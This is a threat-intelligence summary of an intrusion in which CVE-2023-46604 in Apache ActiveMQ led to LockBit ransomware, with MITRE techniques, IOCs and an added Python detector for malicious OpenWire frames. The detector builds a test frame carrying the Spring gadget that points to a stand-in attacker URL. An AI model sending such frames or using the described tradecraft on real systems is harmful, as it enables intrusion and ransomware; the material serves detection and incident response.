Apache ActiveMQ Exploit Leads to LockBit Ransomware – The DFIR Report

A threat actor exploited CVE-2023-46604 on an internet-facing Apache ActiveMQ server to gain RCE, deliver a Metasploit/Meterpreter stager, dump LSASS memory, and move laterally. Eighteen days after initial eviction they re-exploited the same server and used stolen credentials to deploy LockBit ransomware (likely built with the leaked LockBit builder) via RDP and AnyDesk, communicating with C2 at 166.62.100.52. #CVE-2023-46604 #LockBit

Keypoints

  • Initial access was achieved by exploiting CVE-2023-46604 in an exposed Apache ActiveMQ instance using a malicious Java Spring XML payload to run commands and download a Metasploit stager.
  • The Metasploit/Meterpreter stager (uFSyLszKsuR.exe) provided SYSTEM privileges via a getsystem-like sequence, and LSASS process memory was dumped to harvest credentials.
  • Lateral movement was performed through remote service execution (Metasploit-created services) and RDP, enabling access to domain controllers, backup and file servers.
  • The actor was evicted after the first intrusion but re-exploited the same unpatched ActiveMQ server 18 days later and reused previously stolen credentials to escalate rapidly.
  • During the second engagement the actor installed AnyDesk for persistence/remote access, deployed LockBit ransomware binaries (LB3_pass.exe, LB3.exe), and executed them interactively over RDP to encrypt hosts.
  • Ransom notes deviated from standard LockBit infrastructure (using Session messaging), indicating likely use of the leaked LockBit builder by an independent operator; Time to Ransom was ~419 hours from initial access to encryption.
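The first keypoint (and the T1190 entry below) describes the wire-level mechanism of CVE-2023-46604: a vulnerable broker (fixed in ActiveMQ 5.15.16, 5.16.7, 5.17.6 and 5.18.3) takes the class name carried in an OpenWire ExceptionResponse, instantiates it reflectively, and passes the exception message to its String constructor, so a Spring ClassPathXmlApplicationContext plus a URL fetches and executes a remote bean XML. The following is an added example, not code or captures from The DFIR Report: it parses the loose-encoded (pre-negotiation) ExceptionResponse frame layout and flags the gadget/URL combination, using two frames constructed in the block as test input. The attacker URL and the benign auth-failure message are assumptions.

```python
"""Flag OpenWire ExceptionResponse frames that carry a CVE-2023-46604 gadget.

Added example, not code from The DFIR Report. The frame layout is the loose
(pre-negotiation) OpenWire encoding: 4-byte size prefix, 1-byte command type,
then int commandId, bool responseRequired, int correlationId, and a Throwable
written as [present][className][message]. The sample frames below are
constructed for testing, not captured traffic.
"""
import re
import struct

EXCEPTION_RESPONSE = 31  # OpenWire command-type byte for ExceptionResponse

# Spring classes whose (String) constructor loads a bean XML from a location.
SPRING_XML_CONTEXT_GADGETS = {
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "org.springframework.context.support.FileSystemXmlApplicationContext",
}
URL_RE = re.compile(r"^(?:https?|ftp|file):", re.IGNORECASE)


def _read_loose_string(buf, off):
    """Loose string: 1 presence byte, then 2-byte big-endian length + UTF-8."""
    present = buf[off]
    off += 1
    if not present:
        return None, off
    (length,) = struct.unpack_from(">H", buf, off)
    off += 2
    return buf[off:off + length].decode("utf-8"), off + length


def parse_exception_response(frame):
    """Return the fields of a loose-encoded ExceptionResponse frame, or None
    when the frame is some other command type."""
    if len(frame) < 5:
        raise ValueError("frame too short")
    (size,) = struct.unpack_from(">I", frame, 0)
    if size != len(frame) - 4:
        raise ValueError("size prefix does not match frame length")
    if frame[4] != EXCEPTION_RESPONSE:
        return None
    off = 5
    (command_id,) = struct.unpack_from(">i", frame, off)
    off += 4
    response_required = bool(frame[off])
    off += 1
    (correlation_id,) = struct.unpack_from(">i", frame, off)
    off += 4
    fields = {"command_id": command_id, "response_required": response_required,
              "correlation_id": correlation_id, "class_name": None, "message": None}
    has_throwable = bool(frame[off])
    off += 1
    if has_throwable:
        fields["class_name"], off = _read_loose_string(frame, off)
        fields["message"], off = _read_loose_string(frame, off)
    return fields


def exploit_indicators(fields):
    """Reasons the ExceptionResponse looks like CVE-2023-46604 abuse; an empty
    list means nothing suspicious. A vulnerable broker instantiates class_name
    reflectively with message as the String constructor argument."""
    reasons = []
    cls, msg = fields["class_name"], fields["message"]
    if cls is None:
        return reasons
    if cls in SPRING_XML_CONTEXT_GADGETS:
        reasons.append("known Spring XML application-context gadget")
    if not cls.endswith(("Exception", "Error", "Throwable")):
        reasons.append("class name does not look like a Throwable")
    if msg and URL_RE.match(msg):
        reasons.append("message is a URL, i.e. a remote bean-definition location")
    return reasons


def build_exception_response(class_name, message, command_id=0, correlation_id=0):
    """Build a loose-encoded ExceptionResponse frame as a test vector."""
    def loose_string(value):
        raw = value.encode("utf-8")
        return b"\x01" + struct.pack(">H", len(raw)) + raw
    body = (bytes([EXCEPTION_RESPONSE]) + struct.pack(">i", command_id) + b"\x00"
            + struct.pack(">i", correlation_id) + b"\x01"
            + loose_string(class_name) + loose_string(message))
    return struct.pack(">I", len(body)) + body


# Constructed samples: a normal broker auth failure and a gadget-carrying frame.
BENIGN_FRAME = build_exception_response(
    "java.lang.SecurityException", "User name [admin] or password is invalid.")
MALICIOUS_FRAME = build_exception_response(
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "http://attacker.invalid/poc.xml")  # hypothetical URL, not from the report

if __name__ == "__main__":
    for frame in (BENIGN_FRAME, MALICIOUS_FRAME):
        fields = parse_exception_response(frame)
        print(fields["class_name"], "->", exploit_indicators(fields) or "benign")
```

The Throwable-name heuristic is deliberately loose: the patch for this CVE checks that the named class actually extends Throwable, which a passive sensor cannot do without a class catalogue, so a name that is neither an obvious exception nor a known gadget is still worth a look.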

MITRE Techniques

  • [T1190 ] Exploit Public-Facing Application – Exploited CVE-2023-46604 in Apache ActiveMQ by sending a malicious OpenWire Exception Response with a Java Spring ClassPathXmlApplicationContext pointing to a malicious XML payload (‘RCE was accomplished by sending the Java Spring org.springframework.context.support.ClassPathXmlApplicationContext class, along with a URL to a maliciously crafted Java Spring bean configuration XML file’).
  • [T1105 ] Ingress Tool Transfer – Downloaded the Metasploit stager and other executables using CertUtil to retrieve payloads from a remote host (‘downloaded and executed a Metasploit stager named uFSyLszKsuR.exe using CertUtil as the download tool’).
  • [T1059.001 ] PowerShell – Used obfuscated PowerShell and in-memory shellcode loading to execute staged code (Base64 → VirtualAlloc → CreateThread flow) (‘This code performs the following actions: Converts a Base64-encoded string … Allocates memory … Creates a new thread to execute the code in the allocated memory’).
  • [T1059.003 ] Command and Scripting Interpreter: Windows Command Shell – Created and executed batch scripts (rdp.bat) and ran CMD commands to enable RDP, open the firewall for it, and remove artifacts (‘After the creation of the rdp.bat file, several commands were executed via a CMD process to modify the host configuration, specifically to permit RDP through the firewall and set the RDP port number to 3389’).
  • [T1569.002 ] System Services: Service Execution – Created and used services (e.g., kesknq) to execute payloads and escalate privileges via Meterpreter/getsystem behavior (‘we observed the creation of a new service named kesknq’ and ‘This pattern of activity is commonly associated with running the getsystem command in a Meterpreter shell’).
  • [T1003.001 ] OS Credential Dumping: LSASS Memory – Accessed LSASS process memory to harvest credentials used for later lateral movement and RDP access (‘LSASS process memory was accessed on the beachhead by the Metasploit process’).
  • [T1021.001 ] Remote Services: Remote Desktop Protocol (RDP) – Used RDP extensively for lateral movement and interactive ransomware deployment across backup, file, and other servers (‘They then began using RDP to log into other servers, including a backup server and a file server’).
  • [T1543.003 ] Create or Modify System Process: Windows Service – Installed AnyDesk which created a service configured to AutoStart for persistent remote access (‘AnyDesk application created a service and configured it to AutoStart’).
  • [T1218 ] System Binary Proxy Execution – Abused the legitimate, signed Windows binary SystemSettingsAdminFlows.exe (LOLBIN) to disable Windows Defender settings; there is no dedicated sub-technique for this binary, and T1218.011 is Rundll32 (‘the threat actor used a legitimate Windows executable, SystemSettingsAdminFlows.exe … This LOLBIN was used to disable Windows Defender settings on the server’).
  • [T1070.001 ] Indicator Removal: Clear Windows Event Logs – Cleared System, Application, and Security event logs to hinder detection and investigation (‘the threat actor was observed clearing out both System and Application event logs … as well as clearing the Security event logs’).
  • [T1071 ] Application Layer Protocol – The Metasploit stager's C2 traffic went to 166.62.100[.]52 (port 2460 observed) and the later AnyDesk logins came from the same IP, tying the exploitation phase to the ransomware deployment (‘communicated with 166.62.100[.]52’ and ‘Logged in from 166.62.100.52:6761’).
  • [T1486 ] Data Encrypted for Impact – Deployed LockBit ransomware (LB3_pass.exe, LB3.exe) to encrypt systems, drop ransom notes, and change desktop backgrounds (‘These files were LockBit ransomware executables’ and ‘ransom notes were written to directories across affected hosts as the systems were encrypted’).

Indicators of Compromise

  • [IP Address ] C2 and AnyDesk login – 166.62.100[.]52 (C2 communication and AnyDesk login observed).
  • [File Hash ] Ransomware and tool hashes – LB3_pass.exe SHA256: C8646CFB574FF2C6F183C3C3951BF6B2C6CF16FF8A5E949A118BE27F15962FAE, LB3.exe SHA256: 8CEEE89550C521BA43F59D24BA53A22A3B69EAD0FCE118508D0A87A383D6A7B6 (and 2 more hashes including Advanced IP Scanner and netscan.exe hashes listed in the report).
  • [File Name ] Dropped executables and scripts – lb3_pass.exe, lb3.exe (LockBit binaries); advanced_ip_scanner.exe (renamed scanner); rdp.bat (RDP configuration script).
  • [AnyDesk Client ID ] Remote access identifier – AnyDesk Client ID 1148037084 linked to AnyDesk login activity from 166.62.100[.]52.


Read more: https://thedfirreport.com/2026/02/23/apache-activemq-exploit-leads-to-lockbit-ransomware/